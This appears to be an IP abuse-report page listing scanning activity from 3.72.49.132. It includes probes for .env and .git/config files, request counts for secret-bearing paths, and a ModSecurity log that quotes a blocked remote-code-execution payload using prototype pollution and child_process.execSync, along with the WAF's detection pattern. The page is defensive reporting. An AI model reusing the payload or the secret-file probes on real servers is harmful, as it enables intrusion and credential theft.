This IP address has been reported a total of
7
times from
7 distinct
sources.
3.72.49.132 was first reported on
, and the most recent report was
.
Recent Reports:
We have received reports of abusive activity from this IP address within the last week. It is
potentially still actively engaged in abusive activities.
Reporter
IoA Timestamp (UTC)
Comment
Categories
Anonymous
Bot / scanning and/or hacking attempts: GET /.env.local HTTP/1.1, GET / HTTP/1.1, GET /.git/config H ...
show moreBot / scanning and/or hacking attempts: GET /.env.local HTTP/1.1, GET / HTTP/1.1, GET /.git/config HTTP/1.1, GET /.env HTTP/1.1, GET /.env.production HTTP/1.1, POST / HTTP/1.1, GET /.env.staging HTTP/1.1
show less
[SatJun1311:42:17.2359112026][security2:error][pid927126:tid927235][client3.72.49.132:0]ModSecurity: ...
show more[SatJun1311:42:17.2359112026][security2:error][pid927126:tid927235][client3.72.49.132:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\*\\\\\\\\\)\|.\*\)\\\\\\\\\)\|\\\\\\\\{.\*\\\\\\\\}\)\|[\<\>]\\\\\\\\\(.\*\\\\\\\\\)\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\$\(\(41\*271\)\)foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require\(child_process\).execsync\(echo\$\(\(41\*271\)\)\|base64-w0\).tostring\(\).trim\(\)throwobject.assign\(newerror\(next_redirect\){digest:\`next_redirectpush/login\?a=\${res}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}\"][tag\"attack-rce\"][hostname\"life-live.ch\"][uri\"/\"][unique_id\"ai0l-f43QvvYWeNWq6_KlgAAAMo\"]
show less
12.033 requests with url.path *.env
1.892 requests with url.path *phpinfo.php
146 requests with u ...
show more12.033 requests with url.path *.env
1.892 requests with url.path *phpinfo.php
146 requests with url.path *.php.bak
show less